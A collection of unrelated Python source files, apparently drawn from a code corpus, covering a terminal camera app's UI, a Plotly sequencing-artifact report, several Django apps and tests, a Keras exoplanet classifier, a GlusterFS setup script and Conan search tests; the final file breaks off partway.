self._back_camera_button = Button(_("👈 Back to 📷"), self._switch_to_camera, add_box=True)
self.filters = filters
self.filterList = [[i, None] for i in filters.filters]
title_layout = Layout([1])
self.add_layout(title_layout)
title_layout.add_widget(Label(_("Filters"), align="^", height=screen.height // 16))
filters_layout = Layout([100, 100], fill_frame=True)
self.add_layout(filters_layout)
for f in self.filterList:
temp = CheckBox(f[0].name, name=f[0].name)
f[1] = temp
logging.debug(f"{f[0].name} button created")
filters_layout.add_widget(temp)
filters_layout.add_widget(Label(f"{f[0].description} ]", align=">"), 1)
controls_layout = Layout([1, 1, 1])
self.add_layout(controls_layout)
controls_layout.add_widget(self._back_camera_button, 1)
self.set_theme("bright")
self.fix()
logging.debug("Galleryframe initialized")
def _switch_to_camera(self) -> None:
"""Switch to Camera from Filters"""
logging.debug("Switched to Camera from Filters")
for i in self.filterList:
logging.debug(f"{i[0]}, {self.filters.is_loaded(i[0])}, {i[1].value}")
if self.filters.is_loaded(i[0].name) != i[1].value:
self.filters.toggle(i[0].name)
self.save()
raise NextScene("Main")
def _skip_to_next_page(self) -> None:
"""Function to skip to next page of filters"""
pass
def process_event(self, event: Event) -> None:
"""Deals with keyboard events that happen in this screen"""
super(FilterFrame, self).process_event(event)
if isinstance(event, KeyboardEvent):
c = event.key_code
layout = self._layouts[1]
if c == Screen.KEY_HOME:
self.switch_focus(layout, 0, 0)
elif c == Screen.KEY_END:
self.switch_focus(layout, 0, len(self.filterList) - 1)
elif c == Screen.KEY_PAGE_UP:
pass
elif c == Screen.KEY_PAGE_DOWN:
pass
class PreviewFrame(Frame):
"""Recreatable frame to implement preview ui"""
def __init__(self, screen: Any, model: ImageSelectionModel) -> None:
"""Initialize frame"""
super(PreviewFrame, self).__init__(
screen,
3,
screen.width - 4,
x=2,
y=screen.height - 4,
on_load=self._render_image,
hover_focus=True,
has_border=False,
can_scroll=False,
title=APP_TITLE,
reduce_cpu=True,
)
self._model = model
self._back_gallery_button = Button(_("👈 Back to 🖼"), self._switch_to_gallery, add_box=True)
box = Box(screen.width, screen.height, uni=True)
box_effect = Print(screen, box, y=0)
self.add_effect(box_effect)
title_effect = Print(
screen,
StaticRenderer(images=[" " + APP_TITLE + " "]),
y=0,
x=int(((screen.width - 4) / 2) - 5),
attr=1,
transparent=False,
)
self.add_effect(title_effect)
header_effect = Print(
screen,
StaticRenderer(images=[_("Photo Preview")]),
y=1,
x=int(((screen.width - 4) / 2) - 5),
attr=1,
colour=2, # GreenColor
transparent=False,
)
self.add_effect(header_effect)
controls_layout = Layout([1, 1, 1])
self.add_layout(controls_layout)
controls_layout.add_widget(self._back_gallery_button, 1)
self.set_theme("bright")
self.fix()
logging.debug("Previewframe initialized")
def _render_image(self) -> None:
"""Open selected image"""
logging.debug(f"Image opened in preview {self._model.get_path()}")
preview_effect = Print(
self.screen,
ColourImageFile(
self.screen, self._model.get_path(), height=self.screen.height - 8, uni=True
),
y=4,
speed=0,
transparent=False,
)
self.add_effect(preview_effect)
@staticmethod
def _switch_to_gallery() -> None:
"""Switch to Gallery from Preview"""
logging.debug("Switched to Gallery from Preview")
raise NextScene("Gallery")
class SettingsFrame(Frame):
"""Recreatable frame to implement settings ui"""
def __init__(self, screen: Any) -> None:
"""Initialize frame"""
super().__init__(
screen,
screen.height,
screen.width,
hover_focus=True,
can_scroll=True,
title=APP_TITLE,
)
self._back_camera_button = Button(_("👈 Back to 📷"), self._switch_to_camera, add_box=True)
title_layout = Layout([1])
self.add_layout(title_layout)
title_layout.add_widget(Label(_("Settings"), align="^", height=screen.height // 16))
settings_layout = Layout([100], fill_frame=True)
self.add_layout(settings_layout)
imageFormat = DropdownList(
[("JPG", "JPG"), ("PNG", "PNG"), ("ASCII", "ASCII")], _("Image output format")
)
imageFormat.value = settings["IMG_FORMAT"]
imageFormat._on_change = lambda: settings.update({"IMG_FORMAT": imageFormat.value})
settings_layout.add_widget(imageFormat)
language = DropdownList([("English", "en"), ("Esperanto", "eo")], _("Language"))
language.value = settings["LANGUAGE"]
def _switchLanguage() -> None:
settings.update({"LANGUAGE": language.value})
temp = translation("base", localedir="locales", languages=[language.value])
temp.install()
global _
_ = temp.gettext
screen.lang_switch = True
language._on_change = _switchLanguage
        settings_layout.add_widget(language)
        self.settingsList = [imageFormat, language]  # referenced by the END-key handling in process_event below
controls_layout = Layout([1, 1, 1])
self.add_layout(controls_layout)
controls_layout.add_widget(self._back_camera_button, 1)
self.set_theme("bright")
self.fix()
logging.debug("Settingsframe initialized")
def _switch_to_camera(self) -> None:
"""Switch to Camera from settings"""
logging.debug("Switched to Camera from settings")
raise NextScene("Main")
def process_event(self, event: Event) -> None:
"""Deals with keyboard events that happen in this screen"""
super(SettingsFrame, self).process_event(event)
if isinstance(event, KeyboardEvent):
c = event.key_code
layout = self._layouts[1]
if c == Screen.KEY_HOME:
self.switch_focus(layout, 0, 0)
elif c == Screen.KEY_END:
self.switch_focus(layout, 0, len(self.settingsList) - 1)
elif c == Screen.KEY_PAGE_UP:
pass
elif c == Screen.KEY_PAGE_DOWN:
pass
|
import pandas as pd
import numpy as np
import plotly
from plotly.offline import plot
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import sys
def plot_html(table):
'''
    Splits the table (a dictionary of dataframes) and plots each one in
    an html report.
    INPUT: table = dictionary with keys: 'intersection', 'complement',
           'non_intersection', 'intersection_C' and 'complement_C'
'''
def table_to_json(df, normalize=True):
#df = table['intersection'] #pd.read_csv(sys.argv[1])
a = ['a_a','a_t','a_c','a_g']
c = ['c_a','c_t','c_c','c_g']
g = ['g_a','g_t','g_c','g_g']
t = ['t_a','t_t','t_c','t_g']
mutations = set(a+c+g+t).difference(set(['a_a','c_c','t_t','g_g']))
        # df.iloc[:, 2:] /= df[eval(column_name[0])].sum(axis=1).values.reshape(-1, 1)  # disabled; normalization happens below when normalize=True
df = df.replace(np.inf,0).fillna(0)
        # normalize the data so that each reference-base group sums to 1 per row (values end up between 0 and 1)
dfc = df.copy()
errors = {'a': a, 'c': c, 'g': g, 't': t}
if normalize:
for i in errors.keys():
dfc.loc[:, errors[i]] /= (dfc.loc[:, errors[i]].sum(axis=1).values.reshape(-1,1) + 10e-6 )
table_max = dfc[mutations].max().max() * 1.1
table_min = dfc[mutations].min().min() * 0.5
df1 = dfc[(dfc.read==1)]
df2 = dfc[(dfc.read==2)]
# plot the data in horizontal subplots
fig = make_subplots(rows=1, cols=2,
subplot_titles=("Read 1", "Read 2"))
for mut in mutations:
fig.add_trace(
go.Scatter(
x=np.arange(1,df1.shape[0]+1),
y=df1[mut],
mode='markers',
name= mut + ' - R1'
),
row=1, col=1
)
fig.add_trace(
go.Scatter(
x = np.arange(1,df2.shape[0]+1),
y = df2[mut],
mode = 'markers',
name = mut + ' - R2',
),
row=1, col=2
)
# Update markers and color selection
markers = [
"circle", "circle-open-dot", "square", "diamond", "cross", "triangle-up",
"triangle-down","hexagon", "hexagram", "star", "octagon", "square-x"
]
colors = [
'rgb(31, 119, 180)', 'rgb(255, 127, 14)', 'rgb(44, 160, 44)', 'rgb(214, 39, 40)',
'rgb(148, 103, 189)', 'rgb(140, 86, 75)', 'rgb(227, 119, 194)', 'rgb(127, 127, 127)',
'rgb(188, 189, 34)', 'rgb(23, 190, 207)','rgb(188, 189, 150)', 'rgb(23, 190, 150)'
]
for n in np.arange(0,len(fig['data']),2):
m = n//2 + n%2
fig['data'][n]['marker']['symbol']=markers[m]
fig['data'][n+1]['marker']['symbol']=markers[m]
fig['data'][n]['marker']['color']=colors[m]
fig['data'][n+1]['marker']['color']=colors[m]
        # final aesthetic touches
fig.update_traces(mode='markers', marker_line_width=2, marker_size=10) #, visible="legendonly")
fig.update_layout(height=800, xaxis_title="Position in read", yaxis_title="Normalized counts")
fig.update_yaxes(range=[table_min, table_max], row=1, col=1)
fig.update_yaxes(range=[table_min, table_max], row=1, col=2)
# convert it to JSON
fig_json = fig.to_json()
return fig_json
fig_json_i = table_to_json(table['intersection'], normalize=False)
fig_json_c = table_to_json(table['complement'], normalize=False)
fig_json_n = table_to_json(table['non_intersection'], normalize=False)
fig_json_ic = table_to_json(table[ 'intersection_C'], normalize=False)
fig_json_cc = table_to_json(table['complement_C'], normalize=False)
fig_json_i_norm = table_to_json(table['intersection'])
fig_json_c_norm = table_to_json(table['complement'])
fig_json_n_norm = table_to_json(table['non_intersection'])
fig_json_ic_norm = table_to_json(table[ 'intersection_C'])
fig_json_cc_norm = table_to_json(table['complement_C'])
# HTML template
template = """<html>
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.1/css/bootstrap.min.css">
<script src="https://cdn.plot.ly/plotly-latest.min.js"></script>
<title>Tasmanian Report</title>
<style>
.button {{
background-color: white; /* Green */
border: 2px solid #8bd9ff;
color: black;
padding: 16px 32px 0px -10px;
text-align: center;
text-decoration: none;
display: inline-block;
font-size: 16px;
margin: 20px 2px 0px 100px;
transition-duration: 0.4s;
cursor: pointer;
}}
.button:hover {{
background-color: #8bd9ff;
color: white;
}}
h1{{
background-color: #8bd9ff;
padding: 30px 0px 30px 0px;
margin: 10px 120px 0px 80px;
}}
.sidebar {{
height: 100%;
width: 180px;
position: fixed;
z-index: 1;
top: 0;
left: 0;
background-color: #111;
overflow-x: hidden;
padding-top: 16px;
}}
.sidebar a {{
padding: 6px 8px 6px 16px;
text-decoration: none;
font-size: 20px;
color: #818181;
display: block;
}}
.sidebar a:hover {{
color: #f1f1f1;
}}
.main {{
margin-left: 160px; /* Same as the width of the sidenav */
padding: 0px 10px;
}}
@media screen and (max-height: 450px) {{
.sidebar {{padding-top: 15px;}}
.sidebar a {{font-size: 18px;}}
}}
</style>
</head>
<body>
<script type="text/javascript">
function toggle_normalize(id1, id2) {{
var e = document.getElementById(id1);
var f = document.getElementById(id2);
if(e.style.display == 'block') {{
e.style.display = 'none';
f.style.display = 'block';
}}
else {{
e.style.display = 'block';
f.style.display = 'none';
}}
}}
</script>
<div class="sidebar">
<a href="#" style="font-size:30px; background-color:#8bd9ff;">Raw Couts</a>
<a href="#section_divPlotly1">Contained</a>
<a href="#section_divPlotly2">Boundary</a>
<a href="#section_divPlotly3">non-overlapping</a>
<a href="#section_divPlotly4">Contained - confidence</a>
<a href="#section_divPlotly5">Boundary - confidence</a>
<!--<a href="#" style="font-size:30px; background-color:#8bd9ff;">Normalized Couts</a>
<a href="#divPlotly1_norm">Intersections</a>
<a href="#divPlotly2_norm">Complementss</a>
<a href="#divPlotly4_norm">Intersections - confidence</a>
<a href="#divPlotly5_norm">Complements - confidence</a>-->
</div>
<div class="main">
<h1 align="center">Tasmanian artifacts metrics results </h1>
<!-- plot 1 -->
<div id='section_divPlotly1'>
<h2 style="padding-left: 40px; padding-top: 90px;">Intersections</h2>
<h3 style="padding-left: 40px; padding-right: 800; ">Includes all bases that intersect some fragment provided in the bed-file</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly1_norm', 'divPlotly1');">Counts/Normalize Counts</button>
<div id='divPlotly1_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly1_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly1'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly1', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<!-- plot 2 -->
<div id='section_divPlotly2'>
<h2 style="padding-left: 40px;padding-top: 60px;">Complements</h2>
<h3 style="padding-left: 40px; padding-right: 800;">Includes all bases from that do not intersect a fragment, from reads that intersect a fragment provided in the bed-file</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly2_norm', 'divPlotly2');">Counts/Normalize Counts</button>
<div id='divPlotly2_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly2_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly2'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly2', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<!-- plot 3 -->
<div id='section_divPlotly3'>
<h2 style="padding-left: 40px;padding-top: 60px;">Non-intersections</h2>
<h3 style="padding-left: 40px; padding-right: 800;">Includes all bases from reads with no intersections with the bed-file</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly3_norm', 'divPlotly3');">Counts/Normalize Counts</button>
<div id='divPlotly3_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly3_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly3'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly3', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<!-- plot 4 -->
<div id='section_divPlotly4'>
<h2 style="padding-left: 40px; padding-top: 90px;">Intersections confidence</h2>
<h3 style="padding-left: 40px; padding-right: 800; ">Includes all bases that intersect some fragment provided in the bed-file in confidence reads</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly4_norm', 'divPlotly4');">Counts/Normalize Counts</button>
<div id='divPlotly4_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly4_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly4'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly4', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<!-- plot 5 -->
<div id='section_divPlotly5'>
<h2 style="padding-left: 40px; padding-top: 90px;">Complement confidence</h2>
<h3 style="padding-left: 40px; padding-right: 800; ">Includes all complement bases in confidence reads</h3>
<button class="button button1"; onclick="toggle_normalize('divPlotly5_norm', 'divPlotly5');">Counts/Normalize Counts</button>
<div id='divPlotly5_norm'>
<script>
var plotly_data = {};
Plotly.react('divPlotly5_norm', plotly_data.data, plotly_data.layout);
</script>
</div>
<div id='divPlotly5'>
<script>
var plotly_data2 = {}
Plotly.react('divPlotly5', plotly_data2.data, plotly_data2.layout);
</script>
</div>
</div>
<script>
divPlotly1_norm.style.display = 'none';
divPlotly2_norm.style.display = 'none';
divPlotly3_norm.style.display = 'none';
divPlotly4_norm.style.display = 'none';
divPlotly5_norm.style.display = 'none';
</script>
</div> <!-- finish with class main here -->
</body>
</html>"""
# write the JSON to the HTML template
#with open('Tasmanian_artifact_metrics_report.html', 'w') as f:
# f.write(template.format(fig_json))
return template.format(fig_json_i_norm, fig_json_i, fig_json_c_norm, fig_json_c, fig_json_n_norm, fig_json_n, fig_json_ic_norm, fig_json_ic, fig_json_cc_norm, fig_json_cc)
#if __name__=='__main__':
#
# normalize = False
# for n,i in enumerate(sys.argv):
# if i in ["-normalize","--normalize","-n","--n","--norm","-norm"]:
# normalize=True
# if i in ["--table", "-t","--t","-table"]:
#
|
# Generated by Django 3.1.12 on 2021-06-22 08:12
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('home', '0010_merge_20210616_1048'),
('home', '0010_merge_20210617_1019'),
]
operations = [
]
|
#!/usr/bin/env python
'''
Author: Saijal Shakya
Development:
> LMS: December 20, 2018
> HRM: February 15, 2019
> CRM: March, 2020
> Inventory Sys: April, 2020
> Analytics: ...
License: Credited
Contact: https://saijalshakya.com.np
'''
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'businessAnalytics.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
# Post-order DFS traversal
class Solution(object):
def rob(self, root):
"""
:type root: TreeNode
:rtype: int
"""
return max(self.robHelper(root))
def robHelper(self, root):
if not root:
return (0, 0)
leftHouseRobbery = self.robHelper(root.left)
rightHouseRobbery = self.robHelper(root.right)
robCurrentHouseNow = root.val + leftHouseRobbery[1] + rightHouseRobbery[1]
robCurrentLaterLater = max(leftHouseRobbery) + max(rightHouseRobbery)
return (robCurrentHouseNow, robCurrentLaterLater)
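# Quick check (a sketch; assumes the TreeNode class from the commented stub above):
#   root = TreeNode(3); root.left = TreeNode(2); root.right = TreeNode(3)
#   root.left.right = TreeNode(3); root.right.right = TreeNode(1)
#   Solution().rob(root)  # -> 7: rob the root plus the two grandchildren (3 + 3 + 1)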
|
import os
import glob
import subprocess
import traceback
token = os.environ['BINSTAR_TOKEN']
cmd = ['binstar', '-t', token, 'upload', '--force']
cmd.extend(glob.glob('*.tar.bz2'))
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
traceback.print_exc()
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Post(models.Model):
author = models.ForeignKey(User, on_delete=models.CASCADE, related_name='post')
image = models.ImageField(upload_to='post_image')
caption = models.CharField(max_length=264,blank=True)
upload_date = models.DateTimeField(auto_now_add=True)
update_date = models.DateTimeField(auto_now=True)
    class Meta:
ordering = ['-upload_date']
class like(models.Model):
post = models.ForeignKey(Post, on_delete=models.CASCADE,related_name='liked_post')
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='liker')
date_created = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '{}:{}'.format(self.user, self.post)
|
a,b=map(int,input().split())
print(a-1 if a>b else a)
|
import sys
import tensorflow as tf
from keras import backend as K
from keras.models import Sequential
from keras.layers import Conv1D, MaxPooling1D, Activation, CuDNNGRU, Flatten, Dense, Dropout, BatchNormalization
from keras.callbacks import TensorBoard, ModelCheckpoint
from imblearn.over_sampling import SMOTE
from utilities import prepare_data
import numpy as np
NUM_TRAIN = 5087
NUM_FLUXES = 3197
EPOCHS = 10
#Create the architecture of the model as well as compile it
def create_model():
model = Sequential()
#Convolutional Layer
model.add(Conv1D(filters = 64, kernel_size = 8, strides = 4, input_shape = (NUM_FLUXES, 1)))
model.add(MaxPooling1D(pool_size = 4, strides = 2))
model.add(Activation('relu'))
#GRU Layer
model.add(CuDNNGRU(units = 256, return_sequences = True))
#Flatten 3D data into 2D format
model.add(Flatten())
#Fully Connected Layer
model.add(Dense(units = 16, activation = "relu"))
model.add(Dropout(rate = 0.5))
model.add(BatchNormalization())
#Final Activation Layer
model.add(Dense(units = 1, activation = "sigmoid"))
model.compile(optimizer = "adam", loss = "binary_crossentropy", metrics = ["accuracy"])
print(model.summary())
return model
#Train the model on the exoplanet flux training data, upsampling the minority class with SMOTE
def train(model_name):
#SMOTE for upsampling the minority class
X_train, Y_train = prepare_data(NUM_TRAIN, "data/exoTrain.csv")
sm = SMOTE()
X_train, Y_train = sm.fit_sample(X_train, Y_train)
#Reshape the array from 2D into 3D
X_train = np.reshape(X_train, (X_train.shape[0], X_train.shape[1], 1))
model = create_model()
#Add some checkpoints
tensorboard = TensorBoard(log_dir = './Graph', histogram_freq = 0, write_graph = True, write_images = True)
    checkpoint_train = ModelCheckpoint(model_name, monitor = "loss", save_best_only = True)
print("Added checkpoints")
model.fit(x = X_train, y = Y_train, epochs = EPOCHS,
callbacks = [tensorboard, checkpoint_train])
#Code for running the program from the terminal
terminal_length = len(sys.argv)
if(terminal_length >= 2):
#Help command
if(sys.argv[1] == "-h" or sys.argv[1] == "--help"):
print("Write the model name as an argument (without file extension)")
#Train command with model_name
else:
model_path = "models/" + sys.argv[1] + ".h5"
print("Beginning to train the model with the name " + sys.argv[1])
train(model_path)
else:
print("Invalid command.")
print("Use -h or --help for the list of all possible commands")
|
from eth.vm.forks.berlin.headers import (
configure_header,
create_header_from_parent,
compute_berlin_difficulty,
)
compute_daejun_difficulty = compute_berlin_difficulty
create_daejun_header_from_parent = create_header_from_parent(
compute_berlin_difficulty
)
configure_daejun_header = configure_header(compute_daejun_difficulty)
|
import pprint
import math
datapoints = dict(
dp1=(-1.88, 2.05),
dp2=(-0.71, 0.42),
dp3=(2.41, -0.67),
dp4=(1.85, -3.80),
dp5=(-3.69, -1.33)
)
clusters = dict(
cluster_1=(2., 2.),
cluster_2=(-2., -2.)
)
def calc_distance(datapoint, cluster):
return math.sqrt(sum([(c - d)**2 for c, d in zip(cluster, datapoint)]))
def revise_cluster_centers(assigned_cluster, clusters):
output = {}
for cluster_name, dp_names in assigned_cluster.items():
cluster_result = []
for dp_index in range(len(clusters[cluster_name])):
dp_index_total = 0.
for dp_name in dp_names:
dp_index_total += datapoints[dp_name][dp_index]
dp_index_total = dp_index_total / len(dp_names)
cluster_result.append(dp_index_total)
output[cluster_name] = tuple(cluster_result)
return output
for iter_count in range(0, 5):
assigned_clusters = dict(cluster_1=[], cluster_2=[])
for datapoint, values in datapoints.items():
lowest_dist = float('inf')
assigned_cluster = None
for cluster, cluster_values in clusters.items():
distance = calc_distance(values, cluster_values)
if distance < lowest_dist:
lowest_dist = distance
assigned_cluster = cluster
assigned_clusters[assigned_cluster].append(datapoint)
clusters = revise_cluster_centers(assigned_clusters, clusters)
print "Assigned clusters", assigned_clusters
|
from pythonforandroid.build import Context
from pythonforandroid.graph import get_recipe_order_and_bootstrap
from pythonforandroid.bootstrap import Bootstrap
from itertools import product
import pytest
ctx = Context()
name_sets = [['python2'],
['kivy']]
bootstraps = [None,
Bootstrap.get_bootstrap('pygame', ctx),
Bootstrap.get_bootstrap('sdl2', ctx)]
valid_combinations = list(product(name_sets, bootstraps))
valid_combinations.extend(
[(['python3crystax'], Bootstrap.get_bootstrap('sdl2', ctx)),
(['kivy', 'python3crystax'], Bootstrap.get_bootstrap('sdl2', ctx))])
@pytest.mark.parametrize('names,bootstrap', valid_combinations)
def test_valid_recipe_order_and_bootstrap(names, bootstrap):
get_recipe_order_and_bootstrap(ctx, names, bootstrap)
invalid_combinations = [[['python2', 'python3crystax'], None],
[['python3'], Bootstrap.get_bootstrap('pygame', ctx)]]
@pytest.mark.parametrize('names,bootstrap', invalid_combinations)
def test_invalid_recipe_order_and_bootstrap(names, bootstrap):
with pytest.raises(SystemExit):
get_recipe_order_and_bootstrap(ctx, names, bootstrap)
def test_bootstrap_dependency_addition():
build_order, python_modules, bs = get_recipe_order_and_bootstrap(
ctx, ['kivy'], None)
assert (('hostpython2' in build_order) or ('hostpython3' in build_order))
def test_bootstrap_dependency_addition2():
build_order, python_modules, bs = get_recipe_order_and_bootstrap(
ctx, ['kivy', 'python2'], None)
assert 'hostpython2' in build_order
if __name__ == "__main__":
get_recipe_order_and_bootstrap(ctx, ['python3'],
Bootstrap.get_bootstrap('sdl2', ctx))
|
# coding: utf-8
from fabkit import filer, sudo, env, Service
from fablib.base import SimpleBase
class Gluster(SimpleBase):
def __init__(self):
self.data_key = 'gluster'
self.data = {
}
self.services = {
'CentOS Linux 7.*': [
'glusterd',
]
}
self.packages = {
'CentOS Linux 7.*': [
'centos-release-gluster36',
'glusterfs-server',
'glusterfs-fuse',
]
}
def init_after(self):
for cluster in self.data.get('clusters', {}).values():
if env.host in cluster['hosts']:
self.data.update(cluster)
def setup(self):
data = self.init()
Service('firewalld').stop().disable()
self.install_packages()
self.start_services().enable_services()
for volume in data['volume_map'].values():
filer.mkdir(volume['brick'])
def setup_peer(self):
"""
require serial task.
"""
data = self.init()
for host in data['hosts']:
if host != env.host:
sudo('gluster peer probe {0}'.format(host))
def setup_volume(self):
"""
require serial task.
"""
data = self.init()
if data['hosts'][0] != env.host:
return
for volume in data['volume_map'].values():
bricks = ''
replica_option = 'replica 2' if len(data['hosts']) > 1 else ''
for host in data['hosts']:
bricks += '{0}:{1} '.format(host, volume['brick'])
sudo('gluster volume info {0[name]} || gluster volume create '
'{0[name]} {1} {2} force'.format(
volume, replica_option, bricks))
sudo('gluster volume info {0[name]} | grep Started'
' || gluster volume start {0[name]}'.format(
volume))
def mount_local(self):
data = self.init()
for volume in data['volume_map'].values():
filer.Editor('/etc/fstab').a('localhost:/{0} /mnt/{0} glusterfs '
'defaults,_netdev 0 0'.format(volume['name']))
filer.mkdir('/mnt/{0}'.format(volume['name']))
sudo('mount -a')
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import VERSION
from django.apps import AppConfig
from django.utils.translation import ugettext_lazy as _
class ShopConfig(AppConfig):
name = 'shop'
verbose_name = _("Shop")
def ready(self):
from django_fsm.signals import post_transition
from jsonfield.fields import JSONField
from rest_framework.serializers import ModelSerializer
from shop.rest.serializers import JSONSerializerField
from shop.models.notification import order_event_notification
post_transition.connect(order_event_notification)
# Monkey patches for Django-1.7
        if VERSION < (1, 8):
from django.utils import numberformat
from shop.patches import numberformat as patched_numberformat
numberformat.format = patched_numberformat.format
# add JSONField to the map of customized serializers
ModelSerializer.serializer_field_mapping[JSONField] = JSONSerializerField
|
from django.test import TestCase
from .factories import GalleryFactory
class RequestGalleryTest(TestCase):
urls = 'photologue.tests.test_urls'
def setUp(self):
super(RequestGalleryTest, self).setUp()
self.gallery = GalleryFactory(slug='test-gallery')
def test_archive_gallery_url_works(self):
response = self.client.get('/ptests/gallery/')
self.assertEqual(response.status_code, 200)
def test_archive_gallery_empty(self):
"""If there are no galleries to show, tell the visitor - don't show a
404."""
self.gallery.is_public = False
self.gallery.save()
response = self.client.get('/ptests/gallery/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['latest'].count(),
0)
def test_paginated_gallery_url_works(self):
response = self.client.get('/ptests/gallerylist/')
self.assertEqual(response.status_code, 200)
def test_gallery_works(self):
response = self.client.get('/ptests/gallery/test-gallery/')
self.assertEqual(response.status_code, 200)
def test_archive_year_gallery_works(self):
response = self.client.get('/ptests/gallery/2011/')
self.assertEqual(response.status_code, 200)
def test_archive_month_gallery_works(self):
response = self.client.get('/ptests/gallery/2011/12/')
self.assertEqual(response.status_code, 200)
def test_archive_day_gallery_works(self):
response = self.client.get('/ptests/gallery/2011/12/23/')
self.assertEqual(response.status_code, 200)
def test_detail_gallery_works(self):
response = self.client.get('/ptests/gallery/2011/12/23/test-gallery/')
self.assertEqual(response.status_code, 200)
def test_redirect_to_list(self):
"""Trivial test - if someone requests the root url of the app
(i.e. /ptests/'), redirect them to the gallery list page."""
response = self.client.get('/ptests/')
self.assertRedirects(response, '/ptests/gallery/', 301, 200)
class GalleryPaginationTest(TestCase):
urls = 'photologue.tests.test_urls'
def test_pagination(self):
for i in range(1, 23):
GalleryFactory(title='gallery{0:0>3}'.format(i))
response = self.client.get('/ptests/gallerylist/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']),
20)
# Check first and last items.
self.assertEqual(response.context['object_list'][0].title,
'gallery022')
self.assertEqual(response.context['object_list'][19].title,
'gallery003')
# Now get the second page of results.
response = self.client.get('/ptests/gallerylist/?page=2')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['object_list']),
2)
# Check first and last items.
self.assertEqual(response.context['object_list'][0].title,
'gallery002')
self.assertEqual(response.context['object_list'][1].title,
'gallery001')
|
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.contrib.auth.models import User
from astrometry.net.models import UserProfile
@receiver(post_save, sender=User)
def add_user_profile(sender, instance, created, raw, **kwargs):
print('add_user_profile() called. sender', sender)
print('inst', instance)
print('created', created)
print('raw', raw)
if created and not raw:
user = instance
try:
print('profile exists:', user.profile)
except:
print('profile does not exist -- creating one!')
from astrometry.net.models import create_new_user_profile
profile = create_new_user_profile(user)
profile.save()
print('Created', user.profile)
|
import unittest
from conans.search.binary_html_table import RowResult, Headers, Results
class RowResultTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
data = {'id': '1234',
'outdated': True,
'extra': 'never used',
'settings': {'os': 'Windows'},
'options': {'opt.key1': 23},
'requires': ['pkg1/version:1234', 'pkg2/version@user/channel:12345']}
cls.row_result = RowResult("remote", "name/version@user/testing", data)
def test_basic(self):
self.assertEqual(self.row_result.remote, "remote")
self.assertEqual(self.row_result.reference, "name/version@user/testing")
self.assertEqual(self.row_result.recipe, "name/version@user/testing")
self.assertEqual(self.row_result.package_id, "1234")
self.assertEqual(self.row_result.outdated, True)
def test_row(self):
headers = Headers(settings=['os', 'os.api'], options=['opt.key1'], requires=True,
keys=['remote', 'reference', 'outdated', 'package_id'])
row = list(self.row_result.row(headers))
self.assertEqual(row, ['remote', 'name/version@user/testing', True, '1234', # Keys
'Windows', None, # Settings
23, # Options
'pkg1/version, pkg2/version@user/channel' # Requires
])
class HeadersTestCase(unittest.TestCase):
@classmethod
def setUpClass(cls):
settings = ['build_type', 'os', 'other', 'compiler', 'compiler.version',
'compiler.libcxx', 'os.api', ]
options = ['opt.key1', 'opt2']
requires = True
keys = ['remote', 'reference', 'outdated', 'package_id']
cls.headers = Headers(settings, options, requires, keys)
def test_settings_ordering(self):
self.assertEqual(self.headers.settings, ['os', 'os.api', 'compiler', 'compiler.libcxx',
'compiler.version', 'build_type', 'other'])
def test_1row(self):
row = self.headers.row(n_rows=1)
# Order: keys, settings, options and requires
self.assertEqual(row, [
'remote', 'reference', 'outdated', 'package_id',
'os', 'os.api', 'compiler', 'compiler.libcxx', 'compiler.version', 'build_type', 'other',
'opt.key1', 'opt2',
'requires'])
def test_2row(self):
row = self.headers.row(n_rows=2)
self.assertEqual(row, [
# Keys
('remote', ['']), ('reference', ['']), ('outdated', ['']), ('package_id', ['']),
# Settings
('os', ['', 'api']), ('compiler', ['', 'libcxx', 'version']), ('build_type', ['']),
('other', ['']),
# Options
('options', ['opt.key1', 'opt2']),
# Requires
('requires', [''])
])
class ResultsTestCase(unittest.TestCase):
def test_gather_data(self):
# Data returned by the API protocol
json = [
{
'remote': 'remote1',
'items': [{
'recipe': {'id': 'name/version@user/channel'},
'packages': [
{
'settings': {'os': 'Windows', 'os.api': 23},
'options': {'opt.key1': 'option_value'},
'requires': []
},
{
'settings': {'os': 'Windows', 'compiler': 'VS'},
'options': {},
'requires': ['pkgA/vv:1234', 'pkgB/vv@user/testing:12345']
}
]
}]
},
{
